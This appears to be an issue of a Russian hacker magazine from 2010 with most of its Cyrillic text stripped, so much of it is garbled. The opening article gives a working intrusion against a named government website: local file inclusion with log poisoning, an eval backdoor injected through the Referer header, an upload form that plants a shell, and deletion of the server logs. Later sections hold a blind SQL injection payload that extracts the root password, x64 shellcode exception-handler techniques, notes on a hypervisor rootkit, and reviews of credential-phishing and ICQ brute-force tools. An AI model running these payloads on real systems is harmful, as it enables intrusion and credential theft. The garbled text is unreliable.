main.php?query=../../../proc/self/
fd/2%00

?
X 03 /134/ 10


PROOFLINK

[Sun Nov 15 07:41:42 2009] [error]


[client 92.249.112.225] client
denied by server configuration: /
usr/share/phpMyAdmin/
[Sun Nov 15 08:43:31 2009] [error]
[client 65.55.109.220] client
denied by server configuration: /
usr/share/phpMyAdmin/phpAdsNew,
referer: http://xxxx.us/album/
thumbnails.php?album=search&search
=releases

. ,
. ,
403 Forbbiden.
User-Agent ,
Referer, . ,
403.
,
phpMyAdmin. ,
: http://www.mon.gov.ua/
phpMyAdmin,
.
PHP Refereraa:
<?php
$server
=
'212.111.193.189';
$dir
= '/phpMyAdmin/';
$evilcode
= '<?php eval($_
REQUEST[ev]); ?>';
$header
= "GET "
.$dir. " HTTP/1.0\r\n";
$header
.= "Host: "
.$server. "\r\n";
$header
.= "Referer:
" .$evilcode. "\r\n";
$header
.=
"Connection: close\r\n\r\n";
$fp = fsockopen($server, 80);
if(!$fp) { die("[ X ] Connection
failed");} else { echo "[ ~ ]
Connection successful \r\n";}
if(fputs($fp,$header)) {echo "[
~ ] Data sended! \r\n";} else {
die("[ X ] Error While sending
headers!"); }
$result = fgets($fp, 128);
X 03 /134/ 10

if(strpos($result,'Forbidden'))
echo "[ ~ ] Successful! \r\n";
else die("[ X ] Failed!");
?>

,
, , ,
InetCrack, HttpREQ [x26]VOLAND, FireFox.

, ,
. , :
[Xxx Xxx xx xx:xx:xx 2009] [error]
[client xx.xx.xx.xx] client denied
by server configuration: /usr/
share/phpMyAdmin/ , referer: <?php
eval($_REQUEST[ev]); ?>

,
.
: http://www.mon.
gov.ua/main.php?query=../../../proc/self/
fd/2%00&ev=ls+la. ,
.
wget, get, links,
lynx, . html- :
<form action="http://www.mon.gov.
ua/main.php?query=../../../proc/
self/fd/2%00&ev=copy($_FILES[file]
[tmp_name], $_GET[aa]);&aa=./
mon.php" method="post"
enctype="multipart/form-data">
<input type="file"
name="file"><br>
<input type="submit"
value=""><br>
</form>

, (

). ,
2 error.php error.
.

,
. :
<?php/*
[Mon Nov 16 11:14:07 2009]
[error] [client ::1] client denied
by server configuration: /usr/
share/phpMyAdmin/
[Mon Nov 16 11:14:08 2009]
[error] [client ::1] client denied
by server configuration: /usr/
share/phpMyAdmin/
[Mon Nov 16 11:14:14 2009]
[error] [client ::1] client denied
by server configuration: /usr/
share/phpMyAdmin/
[Mon Nov 16 11:14:15 2009]
[error] [client ::1] client denied
by server configuration: /usr/
share/phpMyAdmin/
[Mon Nov 16 11:14:18 2009]
[error] [client ::1] client denied
by server configuration: /usr/
share/phpMyAdmin/
...
*/ ?>
<?PHP
//Authentication
$login = ""; //Login
$pass = ""; //Pass
... ?>

, -
. ,
.
, . ,

GNU, , ,
. . , ,
rm rf /var/log/httpd/. :
, .
,
( ).

,
. z

059

VEH

R0064 R0064@MAIL.RU

WINDOWS
X64

,
X64. , ,
. ,
.
FS . .
, .
.
SEH

32- [fs]
: gs (, TEB ring-3
gs:30h, peb gs:60h). , EXCEPTION_DIRECTORY
PE-. , , fs
, SEH
. SEH
, ...
SEH , . -
64- Windows.
( VEH). 32- Windows (
). , ,
, 32- VEH
wasm.ru/article.php?article=veh.

SEH, VEH :

060

( ) ntdll RtlAddVectoredExceptio
nHandler.
RtlAddVectoredExceptionHandler(
ULONG FirstHandler,
PVECTORED_EXCEPTION_HANDLER
VectoredHandler )

,
SEH. ,
RtlDispatchException ntdll ?
RtlpCallVectoredHandlers, .
! , , ? , , - RtlAddVectoredExceptionHandler.
,
. ntdll RtlpCalloutEntryList ( Win Xp, Vista -
). .
X 03 /134/ 10


( )
VECTORED_EXCEPTION_NODE64.
RtlAddVectoredExceptionHandler windows XP x64:
public RtlAddVectoredExceptionHandler
RtlAddVectoredExceptionHandler proc near
lea r8, RtlpCalloutEntryList
jmp
short RtlpAddVectoredHandler
RtlAddVectoredExceptionHandler endp

PEB LIVEKD
,

CODING

VEH .
shellcode-, . , .
:
1. NTDLL.DLL.
2. RtlAddVectoredExceptionHandler, RtlEncodePointer.
3. , , .
4. .
ntdll PEB:

...
lea r8d, [rdx+20h]
mov rcx, [rcx+30h]
call RtlAllocateHeap
;
test rax, rax
mov rdi, rax ;
rdi

, 18h ( !) , ,
.
VECTORED_EXCEPTION_NODE64,
:
struct _VECTORED_EXCEPTION_NODE64
{
ULONG64
m_pNextNode;
ULONG64
m_pPreviousNode;
ULONG64
unknwn;
PVOID64
m_pfnVectoredHandler;
}

, , , ( 32- VEH).
RtlpAddVectoredHandler.
NtQueryInformationProcess , RtlEncodePointer,
.
. , RtlAddVectoredExceptionHandler VECTORED_EXCEPTION_NODE64.
, , :
1.
RtlEncodePointer ( );
2. RtlEncodePointer-
18h VECTORED_EXCEPTION_NODE64. , ,
, .
X 03 /134/ 10

....
mov rcx,gs:[60h] ; Peb x64
mov rcx,[rcx+18h] ; PEB_LDR_DATA
mov rcx,[rcx+10h]
; PEB_LDR_DATA.InLoadOrderModuleList
mov rcx,[rcx]
mov rbx,[rcx+30h] ; ntdll.dll base
....

ntdll. , . , ,
:
....
hash_str:
push rdx
push rsi
sub rax,rax
mov rsi,rdx
sub rdx,rdx
nxt:
cld
lodsb
cmp al,ah
je dn
add dx, ax
rol rdx,14
jmp nxt
dn:
mov rax,rdx
pop rsi
pop rdx
ret
....

rdx
, , -

061

UNINFORMED
WINDOWS
X64
(hndlr01).
(hndlr02).
rdmsr ( - ),
hndlr01 ( ),
hndlr02. , :
...
mov rbx,rsp
sub rsp,4*8
mov rdx, offset hndlr01
mov rcx, 1 ; first_handler
call qword ptr [rbx]
; RtlAddVectoredExceptionHandler
add rsp,4*8 ;
push rax ; VECTORED_
EXCEPTION_NODE64
sub rsp,4*8
mov rcx,offset hndlr02
call qword ptr [rbx+8] ; RtlEncodePointer
add rsp,4*8
pop rdi ; rdi -> PVECTORED_EXCEPTION_NODE64
; hndlr02
mov [rdi+18h],rax
;
; cpl = 3 => exception
rdmsr
...

, ?
RtlAddVectoredExceptionHandler ,
!
VECTORED_EXCEPTION_NODE64.
, fs (, ).
, RtlAddVectoredExceptionHandler.


VEH-

, ,
VEH, . , ( !),
RtlDispatchException. , , RtlRaiseException,
RtlDispatchException.
int __fastcall RtlRaiseException(struct _EXCEPTION_RECORD
*ExceptionRecord, int, int, __int64, __int64, __int64)

062

FDBG
....
call RtlVirtualUnwind
mov r11, [rsp+538h+ContextRecord._Rip]
mov [rbx+10h], r11
mov rax, gs:30h
mov rcx, [rax+60h]
cmp byte ptr [rcx+2], 0
jnz loc_77F528CB
lea rdx, [rsp+538h+ContextRecord]
mov rcx, rbx
call RtlDispatchException
....

, RtlDispatchException
call RtlpCallVectoredHandlers:
...
RtlDispatchException proc near
mov
[rsp+arg_8], rdx
mov
rax, rsp
sub
rsp, 6A8h
mov
[rax+18h], rbx
mov
[rax+20h], rbp
mov
[rax-8], rsi
mov
[rax-10h], rdi
mov
[rax-18h], r12
mov
[rax-20h], r13
mov
[rax-28h], r14
lea
r8, RtlpCalloutEntryList
mov
rbx, rdx
mov
[rax-30h], r15
mov
rsi, rcx
mov
[rsp+6A8h+var_668], 0
call
RtlpCallVectoredHandlers
...


RtlpCallVectoredHandlers.
WinXP:
...
loc_77F251F5:
; CODE XREF:
RtlpCallVectoredHandlers+3F2BE
mov
rbx, [rsi+18h]
mov
r9d, 4
lea
r8, [rsp+88h+var_58]
lea
edx, [r9+20h]
X 03 /134/ 10

WASM.RU VEH

mov
rcx, 0FFFFFFFFFFFFFFFFh
mov
[rsp+88h+var_68], r12
call
NtQueryInformationProcess
mov
r11d, [rsp+88h+var_58]
lea
rcx, [rsp+88h+var_48]
xor
r11, rbx ; <-
call
r11 ; <-
lock btr cs:dword_77FA58C8, 0
...

Vista:
...
loc_78E9393F: ; CODE XREF: RtlpCallVectoredHandlers-16030
add
dword ptr [r12+10h], 1
lea
rbx, [r12+10h]
mov
rcx, rdi
mov
[rsp+68h+arg_18], r12
call
RtlReleaseSRWLockExclusive
mov
rcx, [r12+18h]
call
RtlDecodePointer
; <-
lea
rcx, [rsp+68h+var_48]
call
rax ; <-
...

, , , , .

X 03 /134/ 10

NtQueryInformationProcess/RtlDecodePointer. ,
call-. ,
. , ,
.
, Vista
VEH- PEB. ?
RtlpCallVectoredHandlers :
...
mov
mov
mov
bt
jb
...

rax, gs:30h
; TEB
r15, [rax+60h]
; PEB
eax, [r15+50h] ; ProcessUsingVEH
eax, r8d ;
call_vectored_handlers

,
PEB !

64- Windows, SEH, VEH.


. , , ,
.
( )
. ,
. z

063


r0064 r0064@mail.ru

2.
AMD-V.
.

,
. .

Long Mode ,
( ),
Long Mode , 64-
-.

VMRUN


( ? :))
VMRUN .
,
VM_HSAVE_PA.
VMCB (
rax).
,


...

VMCB?

VMRUN
(
). - -

064

,
VMEXIT_INVALID (,
VMEXIT
).
, VMRUN ?
,

VMCB.
, VMCB:
http://opensolaris.org/sc/src/xengate/xvm-3.4+xen.hg/xen/include/
asm-x86/hvm/svm/vmcb.h

1. SVME EFER 0.

.
2. CR0.CD CR0.NW. Cache Disable ,
. ( , AMD)
. , VMRUN
CD.
3. 32 CR0 0.

CR0 ( long
mode), ,
0 ( ).
4. CR3, CR4, DR6, DR7, EFER
, MBZ (Must
Be Zero).
5. ASID 0. ASID
,

(TLB).
ASID
.
, TLB
. ASID-
TLB
. , , .
6. .
,
.
// eventinj_t VMCB

X 03 /134/ 10

VMCB VMRUN 10h



VMRUN :
...
// VMRUN_INTERCEPT
0
pVmcb->general2_intercepts|=1;
...

typedef union
{
u64 bytes;
struct
{
u64 vector: 8; //

u64 type: 3; //

u64 ev: 1; // ,
( errorcode).
u64 resvd1: 19; //
u64 v: 1; // Valid.
,
,

u64 errorcode:32; //

} fields;
} __attribute__ ((packed))
eventinj_t;

, ( type) 4:
0 INTR ( );
2 NMI ( ).
NMI, (vector) ;
3 ;
4 .
ev (Error code valid) ,
errorcode
.
? , 64- ,
#BR (
bound), .
VMEXIT_INVALID,

X 03 /134/ 10

type (1,5,6 7).


, 2,
NMI ( , !).
7. EFER.LMA (Long Mode Active)
LME (Long Mode Enable),
Long Mode, ,
Long Mode.
,
.
8. EFER.
LME CR0.PG ( ) CR4.PAE ( CR0.PE) .
9. EFER.LME, CR0.PG, CR4.PAE (
), CS.L
CS.D . CS
. L D
. 32- D
(32
16 ), L , ,
64 . , , ,

(
,
64
32 ).
10. VMRUN (
VMCB)

. ,
. ,
VMRUN, .
, .

20 (!) .
.

, general2_intercepts
VMRUN
svm-:
VMMCALL,VMLOAD,VMSAVE,STGI,CLGI
SKINIT,
.
11.
MSR (MSRPM) - (IOPM)
.
() ! MSR ( -)
4 .
VMRUN 12
MSRPM IOPM. , ,
.
VMCB , .
, .
,
:).
VMRUN

.
, VMRUN
( State Save
Area):
1. CS rip ,
. CS , rip
long mode (
32-,
eip).
2. rflags,rax...
3. SS ( ) rsp .
32- rsp, a esp :).
4. CR0, CR2 (

page fault), CR3, CR4 EFER .
5. IDTR, GDTR( GDT IDT),ES DS, DR7 DR6.
6. V_TPR (TPR). v_tpr
CR8 .
,
, , , -
,
- ,
.
(, 7) CR8

7() .

065

CR0

HTTP://WWW
links

Broken Sword
wasm.ru, : http://
wasm.ru/publist.
php?list=24.

( )
Long Mode

.

AMD64 (EM64T)
viva64.com/content/
articles/64bit-development/
?f=amd64_em64t_rus.
html&lang=ru&
content=64-bitdevelopment.

x8664

insidepro.com/kk/
072/072r.shtml.

An
Introduction
to HardwareAssisted Virtual
Machine (HVM)
Rootkits (
,
TSC_OFFSET)
megasecurity.org/
papers/hvmrootkits.pdf.

Revision Guide
for AMD NPT Family
0Fh Processors
( erratum-)
support.amd.
com/us/Processor_
TechDocs/33610.pdf.

066

CR3 LONG MODE ( 64 !)


7. V_IRQ. ,
.
8. CPL .
CPL = 0,
8086, 3.
CPL : 0 , 3, , .
VMRUN (Control Area).
TSC_OFFSET.
TSC_OFFSET
( TSC) ,
.
, rdtsc,

TSC_OFFSET.
(Erratum 140), TSC MSR
rdmsr, rdtsc TSC_OFFSET .
, Control Area
,
.
ASID ..
VMCB
segment_register ( Xen),
:
// ,
typedef union segment_attributes
{
uint16_t bytes;
struct
{
uint16_t
uint16_t
uint16_t
uint16_t
uint16_t

type:4;
s:
1;
dpl: 2;
p:
1;
avl: 1;

/*
/*
/*
/*
/*

0;
4;
5;
7;
8;

Bit
Bit
Bit
Bit
Bit

40-43 */
44 */
45-46 */
47 */
52 */

uint16_t
uint16_t
uint16_t
uint16_t
} fields;

l:
db:
g:
pad:

1;
1;
1;
4;

/* 9; Bit 53 */
/* 10; Bit 54 */
/* 11; Bit 55 */

}
__attribute__ ((packed)) segment_
attributes_t;

// , VMCB
struct segment_register
{
//
uint16_t
sel;
//
segment_attributes_t attr;
//
uint32_t
limit;
//
uint64_t
base;
} __attribute__ ((packed));

VMCB . :
1. , (D, L, R).
2. TR TSS (,
).
3. LDTR (P).
- ,
VMRUN (,
). VMRUN
#VMEXIT.
VMRUN VMEXIT:
X 03 /134/ 10

CR4

LONG MODE
//
( )
// paVmcb physical address vmcb
// vaVmcb virtual address vmcb
do
{
// VMEXIT
, ..
InstallIntercepts(vaVmcb);
// VMRUN
VMCB
_VMRUN(paVmcb);
//

switch(vaVmcb->exitcode)
{
case VMEXIT_RDTSC:
...
break;
case VMEXIT_VMRUN:
...
break;
...
//

}
}while(1);



( X 03 /134/ 10

). .

VMCB

,
?

:).

VMCB Host Save Area
MmAllocateContiguousMe
morySpecifyCache. :
NTKERNELAPI
PVOID
MmAllocateContiguousMemorySpeci
fyCache(
IN SIZE_T NumberOfBytes, //

IN PHYSICAL_ADDRESS
LowestAcceptableAddress, //
IN PHYSICAL_ADDRESS
HighestAcceptableAddress, //
IN PHYSICAL_ADDRESS
BoundaryAddressMultiple OPTIONAL,
//
IN MEMORY_CACHING_TYPE
CacheType
);

,
( , ).

VMCB:
..
l1.QuadPart = 0; //

l2.QuadPart = -1;
//
l3.QuadPart = 0x10000;
//
// VMCB 1 , =>
uNumberOfPages = 1
// CacheType = MmCached
PageVA = MmAllocateContiguousMe
morySpecifyCache (uNumberOfPages *
PAGE_SIZE,l1, l2, l3, CacheType);
if (!PageVA)
return NULL;
//
RtlZeroMemory (PageVA,
uNumberOfPages * PAGE_SIZE);
//

PagePA = MmGetPhysicalAddress
(PageVA);
...


HSA, MSR IOIO.

. , ,
(
), . ,
.
-
e-mail
(
). z

067


Ams ax330d@gmail.com



SQL
SQL
.
, ,
SQL- ,
-
,
.
SQL, .


? ,
, . ,
. , ,

/. , ,
SQL-. -,
.
.

, - , ?
,
,
, true/false. , . .
, : , time-based SQL . !

068

, advanced timebased SQL-.


, ,


.
,
- .
, .

.
MySQL 5. ,
5.0.12 , ( ) SLEEP().
mysql> SELECT SLEEP(2);
+----------+
| SLEEP(2) |
+----------+

|
0 |
+----------+
1 row in set (2.00 sec)

-
.

BENCHMARK() :
1. BENCHMARK() ,
;
2. BENCHMARK() ,
;
3. SLEEP() ;
4. BENCHMARK() WAF.

SQL- ?
, ,
/, .
. ,

X 03 /134/ 10

2
SUBSTR()
MID(),
ASCII-. ,
, SLEEP().
mysql> SELECT ORD('*');
+----------+
| ORD('*') |
+----------+
|
42 |
+----------+
1 row in set (0.00 sec)

,
. *
42 , f?

40. 42 ,
, -
0.
.
:
http://victim.com/index.php?id=1
AND 1=(SELECT SLEEP((ORD(MID(passw
ord,N,1))-40)) FROM 'mysql'.'user'
WHERE `user`='root' LIMIT 1) --

?
:
1. N- ;
2. ORD() ASCII-;
3.
SLEEP().

, , . , , ,

. ,
-.
Perl-, X 03 /134/ 10

POC-

.
- , (
). : , ,
, , ,
Proof Of Concept.

-p (
precision, -, ).
, .

, ,

root ( ),
. ( , ), ,
.



,
:
,
, .
,
2, -


5 ( ).
ASCII-
50, 2.
, ,
, .
6.5 ,
ASCII- 52, 4.
, - ,

.
,
, ,
, precision. , -p.


,
.
, ,
.
, , .
, .
6.5 ,

069

APACHE
. ,
precision, ,
2 11-13
(). ,
11 ,
13,5 ,
.
,
. , 0,
41 (
) 400
,

318 .
, ,
? , ,

. ,

.


( SQL-) , , .
,
.
, ,

. , ,
,
, ,
0-9, A-Z. *.
-

BENCHMARK() GREENSQL'

070

. , , ,
MySQL, .
. , ,
,
.
, ,
, .

,
?. ,
, 40
40- MySQL
-
SQL-.
,
,
.

MySQL
. , PostreSQL
SLEEP()
pg_sleep(), .
, , .
, ,
,
-
. ,

SQL-.
,
.
? z
X 03 /134/ 10


icq 884888, http://wap-chat.ru

X-TOOLS

: QIP Fake
: WINDWS 2000/2003/XP/VISTA/7
: JIYKA

QIP,

-
: QIP 2005 :).

: ArxScanSite
: WINDOWS 2000/2003/XP/VISTA/7
: ARXWOLF


X-Tools
(jiykasoft.3dn.ru)
ICQ- QIP.

QIP 2005 Build 8092.
:
, ( ,
, ),

.

:
: JIyka
: JIykaSoft.3dn.Ru
Email : JIyk@bk.ru
: uin;pass


.

: *.htm ,

:).
QIP\
Skins\skins.cfg:
e-mail,
;
;

.
QIP\
Skins\ICQ5\start.jpg .

, :
QIP 2005 (http://qip.ru/ru/pages/download_qip_ru)

072


ArxWolf webxakep.net
.
?
, ,

, ,
,

,

AntiDDoS-.
:
( 1 50
)
http https
(HTTP
200, 301, 404, 403, 401, 302)
(
)
Proxy/
Socks

( )



(
)
(
)
HTTP--

(UserAgent, Referer ..)


,


:
.htaccess
.htconfig
.htpasswd
_adm/
_install/
_mysql/
_notes/
_private/
_update.php
_voip/
_vti_bin/
~install.php
~update.php
1.php
1/
2003/
2006/
2007/
2008/
666/
about.php
about/
access
access_log
account.asp
account.html
account.php
acct_login/
add/
addnews/
adm/
adm2/
admin.asp
admin.cfg
admin.dat
admin.html
admin.inc
admin.php

: Storm 2008 Brutal


Edition
: WINDOWS 2000/2003/XP/VISTA/7
: Q1P
Storm 2008 Brutal Edition icq-,
, ICQ- .

. -

X 03 /134/ 10

syntax: /autosave value


/show show .Brutal and bot windows
/hide hide .Brutal and bot windows
/runbrt run and start .Brutal
/killbrt hard terminate brute
process
/good show good list

Storm 2008 Brutal Edition


.Brutal 0.3-0.8+ (
IPD-, ,
).
:
.Brutal (,
, cleanup,
, );
windows
;
good' icq-()
;
;

(
,
,
);
;
;

;
:
, icq gate (
), , ..
:
1. Brutal control.
/stats (or 1) show .Brutal
statistics
/start press 'start' button in
.Brutal
/stop press 'stop' button in
.Brutal
/pause press 'pause' button in
.Brutal
/continue press 'continue' button
in .Brutal
/cleanup clean proxies in .Brutal
syntax: /cleanup [proxy_type]
proxy types: https (h), socks4 (s4),
socks5 (s5)
note: without parameter = cleanup
all proxies
/brtopt display .Brutal options
/threads set threads count
syntax: /threads value
/timeout set timeout option
syntax: /timeout value1 value2
note: value2 used only with .Brutal
0.5
/clntime set cleanup time
syntax: /clntime value
/autosave set autosave time
X 03 /134/ 10

2. Bot administration.
/adminlist show admin list with
permissions
/add add UIN to admin list
syntax: /add UIN[:permissions]
ex.: '/add 123123', '/add 321321:++--'
permissions: 1 send new good's, 2
allow to use commands, 3 allow to
use /stats, 4 allow to administrate
bot, 5 notify terminating
default permissions is -+++/delete delete UIN from admin list
syntax: /delete UIN
/pchange change permissions
syntax: /pchange UIN:perm_
index:permission , /pchange
UIN:permissions
ex.: '/pchange 123123:1:+', '/
pchange 321321:+-+-+'
/settings display bot settings
/set set bot settings
syntax: /set -option value
note: for information send '/set ?'
/botlog show bot log
syntax: /botlog [count] default
count is 10
note: large messages will not be
delivered
/messlog show messages log
syntax: /messlog [count] default
count is 10
note: large messages will not be
delivered
/pluglist show list of plugins
/clrlog clean system and messages
logs

,

,
. ,

icq (
, ).
( )
,
.

.
,
: ,
, ,
(
, rar zip) ..


uin;pass ,
, , . ,

,
,
.

.
,
,
, .

, (
)
http://qip-blog.
eu.org/storm2008be.

: ORACLE SECURITY TOOLS


(GUI)
: WINDOWS 2000/2003/XP/VISTA/7
: CYBER$NAKE


MySQL MySQL?

. Oracle Security
Tools ,
Oracle 8i-9i, 10g, 11g. Oracle
Client
Oracle
.
:
Oracle;
Oracle
;
Oracle
=;
Windows 2000/
XP/2003 (
);

DOS ;

;
TNS listener.log;
;
.
securetools.ru. z

073


lozovsky@gameland.ru

X-

,
,
,
.

,
,
,

074

. ,

. ,


(, )
!

X 03 /134/ 10

AMATEUR PHOTO:

SINtez aka

SINTEZ
( )
(,


)

:
: , -

- .

,
,
, ,
.
? , ,
: ,
, .
,
, ,
,
. ! , ? , .
z
. ,
, , -,
, -
, , ,

Mens Health ( , z . SINtez
:
-? , ,
, , . ? ,

Dr.Cod aka

:
. ,
( 1998).
:

.
-, ,
.

- -
,
. Dr.Cod

,


, , .
X 03 /134/ 10

,
,
. ,
, .
? IRC ?
! ,
, - ,
.
?
, ? ,
:
! ,

, - .
.
2poisonS aka , ,
.
: -
. .
!

http://2funkey.ru, , :).

, FAQ ( Hack-FAQ,
!), ,

,
, . ,
,
.
(
), , .
,

,
,

:) ,
(, )
.



, 1959
. , .
:

. , ():
,
,
.
:

,
,
,
,
,

.

075

Holod aka

: 1999
: ? (-, , . ).

, , ,
.
, , ,
,
, . ,
.


( ),
,
, :
,

:), ,

z .

HorrifIc aka

: 1999
:

HOLOD

,
, , :
,

.
, , ,
:),
(2003-2004-) z
.
: -, -!
IT ,

HR (human resources).
.
: ,

, -,
, -, . .
,
.

,
z.
,
25.

x-crew.

HORRIFIC

,


, , ,
.
.

.
,
( 7
!)
Hack-FAQ, Horrific

z.
, , SINtez
,

, ,

076

,
:).
( 40000 ), z ,
,

.

, ,
,
, .
,
, z,
,
Horrific,

z 2001 :). -

, web-
,
www.cydsoft.com,
www.heapar.com www.flenov.info (
, ).


, ,

.
.
.
,
.
X 03 /134/ 10

aka

: 1999

: ,


( ,
. ).

-,
. . ,
,
,

.
, ,
.
,
, : SINtez,

, ,
z.
, ,
.

Mindw0rk aka

: 2003
:

2004 ( .
!
!).

,
,
.
z
, , ,
,
. , ,
, ,
, , ,
,
( ,

),
X 03 /134/ 10

, .
, ,
AI: SkyNet
.
, ,
,
,

, z
, ,
X-Crew, ,
,

SMS :
? ! ?
? ! !.

, Scut-, m00,
cDc
(!)
udaff.com.


,

( ),

,
.
.


,
,
, , XXI
,
. ,
mindw0rk.
,

( , ), MMORPG (

,
.
,
.
: . ,
. PR-
RuTube
Mediahunter.ru.
: .
, . ,
VIP-.
.
.
,
.
- *!,

.

MINDW0RK
FREEBSD. ,
!

),
,
. , , - .
: .
, ,
-.
. ,
.

, z: , , , .
,
- ,
. ,
- ,
:).

077

b00b1ik aka

: 2004
:
.

,
,
, ,

,
z? , ! -,

,
. -,

( , ,
, ),
(asechka.ru), ,
, (
), ,
. ,

aka CuTTer
,
( 2004 )
.
,
,
, ( 18 )
,
- 60% .
(,
, ,
, , ),
.
( , ,
CuTTer NSD),

,
, ,
PC-ZONE
, ,
(M.J.Ash)
, , ,
- . ,

DVD: Caution! Hot content! / , !


, , ,
:
z-.

. ,
z :).
,

078



,
2010- . ,
z- -

,
,
, ? ,
-
- .

.
,
,
, .
, ,
- .

,
: .


( ,

-). ,
- :). z
X 03 /134/ 10


MIFRILL MIFRILL@REAL.XAKEP.RU

BITTORRENT

.
,



.
,
,
,


,

,

BITTORRENT,

.
080

X 03 /134/ 10

?
, , , ,
. ,
, , ,

. ,


, .

, , ,
,

. 1975 , , , ,
,
, ,
. ,
,
. ,
,
, .
,
2 , .
,
-.
, - Stuyvesant High School.
, ,
. , ,
, ,

,
, . , ,
, , , ,
.
, , ,
,
, , ,
. ,

, , ,
.
-
,
.

,

( , ).
:

,
X 03 /134/ 10

BITTORRENT INC.


. ,
, ,
, ,
; -
,
.
, ,

,
.

( , Basic C),
6 .
80- Stuyvesant High School
,

, , , , 10 .
1993 , ,
, .

,
,
,
,
.
,
, .
,
.
, , , ,
, .
,
,
90-,
2000- . ,

- :).


, ,
,

081

BITTORRENT

, , !


Python Java.
,
Evil Geniuses
for a Better Tomorrow.
,
,

MojoNation.
1999-2001
, peer-to-peer

,
;
Napster, -
KaZaa,

, - , ,
MojoNation ,
.
,

KaZaa

,
upload. ,
, , ,
700 , , 1.5 \,
1\10
. ,


. , ,
, . , ,
,
, ,
,
, ,

.
,
,
,
,
, ,
.
, , ,

, ,
, .


2001 , ,
1 2001.
Gnutella eDonkey2000, .


,
,
-
.
MojoNation :

, ,
MojoNation

, ,

,
.

082

mp3 ,
, -
, ,

,

.

2001
Evil Geniuses for a Better
Tomorrow
,
.

, ,

BitTorrent
,
.


2001 ,
,
1 2001.
,
BitTorrent
,
- :).
, ,
, ,
:

;
;

; ,

;
, (Give
and ye shall receive
).
,
BitTorrent-, 2002 , CodeCon,
,
.
BitTorrent
OpenSource-, ,
, ,


. ... ,
, ,

,

C BitTorrent,
-
-
-. ,


, .
, ,
,

BitTorrent .
,

.
,
:
BitTorrent

, ,
X 03 /134/ 10

.

( , ,
),
BitTorrent . , , ,
vs. -

.
,
,
.
,
. 2003
,
Valve
(-, Half-Life),
. -
PayPal, ,
, ,
, ,
.
, , 2003
BitTorrent 20 .
. , .
,
,
.

Valve 2004-,
.

X 03 /134/ 10

.
-
BitTorrent Inc.,
.
, BitTorrent,

( - ) BitTorrent DNA (Delivery
Network Accelerator) BitTorrent Software Development Kit.
. , 2005
BitTorrent Inc. , MPAA (
) ,
BitTorrent
,
.
,
,
,
. , ,

, -
,
BitTorrent
, ,
.
, , , ,
,
.
, -,

, -,
MPAA, RIAA
,
.
, ,
, .
, , , ,
, ,

DVD,
,
, . ,
,
,
,
,
, , ,
. - ,

,
, , . ,
,

, -,
, . , ,
;
BitTorrent , ,
5
. z

083

UNIXOID
HATCHET MAKS.HATCHET@YANDEX.RU

Gujin, netboot.me
boot.kernel.org
, , ,
?
, , ? ? ,
Gujin,
netboot.me boot.kernel.org.
GUJIN.
LiLo Linux ,
Grub

, Gujin (http://gujin.
sourceforge.net) , .
Linux-,
(*.bdi) ISO-
.
Gujin . ,

/boot.

. ,
Linux
.
, Gujin ,

084

-, USB-, CD-ROM,
SD-. DOS. Gujin
ELF32
ELF64, gzip,
, FAT12, FAT16, FAT32, ext2, ext3,
ext4 ( inode) ISO 9660.

,
(,
USB- ).
,

. -, Gujin
,
,
,
CD/DVD-ROM

BIOS. -,
Gujin , : 64-
ELF- 32- 64 .
-,
Gujin :
- .
Gujin

Linux;
http://sourceforge.net/projects/gujin/
files.
tar.gz-,
:
$ tar -xzf debian32.tar.gz
$ sudo dpkg -i gujin_2.7_i386.deb

/sbin
gujin,

X 01 /133/ 10

3. gujin :
$ sudo gujin --remove /dev/sda

Gujin

. ,
,
:
$ sudo gujin //gujin.ebios


gujin :
$ sudo gujin --mbr-device=/dev/sda
/mnt/sdb/boot/gujin.ebios

boot.kernel.org
, /usr/share/doc/gujin/
, man-
/boot/gujin.ebios.
Gujin
, .
,
qemu :
$ sudo qemu /dev/sda


. <F1-F12>
, + - ,

, / *
,
.
, qemu -
.


. , -

,
(, VESA),
(, ISO-, CD-ROM, -,
), (!)
. ,
Gujin
. .
Gujin
:
1. :

$ sudo gujin --full /dev/fd0

-
/
initrd /boot. Gujin
, -t
.
Gujin USB-
:

$ sudo gujin /dev/sda


$ sudo gujin --mbr /dev/sdc

USB-, .
2. :
$ sudo gujin --report /dev/sda

,
.

GUJIN
--bootdir= .
--cmdline= Linux-.
-f, --full .
--mbr-device= MBR .
--quickboot= , (
, ).
--default_ide_password= IDE-.
--default_video_mode= VESA- (
, <Tab> ).
-d=, --disk=DOS|BCD|PIC|FLOPPY|IDE|BIOS|EBIOS ...
( BIOS).
-COM[1-4][,<9600>[,<n>[,<8>[,<1>]]]]], --serial=COM[1-4]... .

X 01 /133/ 10

.ebios
,
gujin .
: bios, ebios, idechs, idelba, and idel48.
Gujin -

:

FAT12/16/32
.
,
dd:
$ sudo dd bs=512 count=64 if=/dev/
zero of=/dev/sdc

BIOS USB
.
superfloppy,

( ):
$ sudo gujin --disk=BIOS:0x00,auto
/dev/sdc

Gujin CD ( El-Torito).
mkiso ISO- (, )
:

085

UNIXOID

FreeBSD

Gujin

GUJIN
* 15 ISO- .
* ISO 127 .
* ISO ext2/ext3.
* LiveCD - , / /boot.
* Gujin LiveCD,
, .

$ gujin image.iso

512
FAT-,
.
USB-.
-t .
Gujin DOS-,
Linux DOS:
$ gujin boot.exe

GUJIN.
Gujin .
,
. ,
. , Gujin ,
MBR-, ISO-,
, USB-, -,

, ,

.
,

-.


, Linux-

086

,

? , ?
, netboot.me

.
: ,
( )
,
. ,
-
, :
1.
(

).
2. ( memtest86).
,
.
3. .
(

).
4.
.
BIOS,
,
,
.
netboot.me gPXE
(http://etherboot.org/wiki),

, PXE.
PXE,
, gPXE
, -, USB-

, FTP, HTTP NFS.
gPXE netboot.me
.
, netboot.me . kernel
initrd .
,
.
netboot.me
gPXE-:
USB-, - CD. ,
:
1. gPXE-.
2. :
$ sudo
fd0 //
$ sudo
sdf //

dd if=netbootme.dsk of=/dev/
-
dd if=netbootme.usb of=/dev/
USB-

3. .

,

NETBOOT.ME BKO
netboot.me boot.kernel.org
, .
. ,
( <Ctrl+B>) .

X 01 /133/ 10

Gujin

netboot.me
Gujin

DHCP-,
.
4. /.
:
Debian Lenny (5.0).
Debian Testing.
Fedora 11.
OpenSUSE 11.1.
Ubuntu Jaunty (9.04).
Ubuntu Karmic (9.10).
FreeBSD 7.2.
MirOS bsd4me current ( Open NetBSD,
www.mirbsd.org).
LiveCD :
Tiny Core Linux 2.2.
Micro Core Linux 2.2.
MirOS bsd4me current.
:
Memtest 86 Memtest 86+.
HDT 0.3.4.
- GParted
Live 0.4.5-2 Parted Magic 4.5.
Ubuntu Jaunty (9.04) x86 rescue
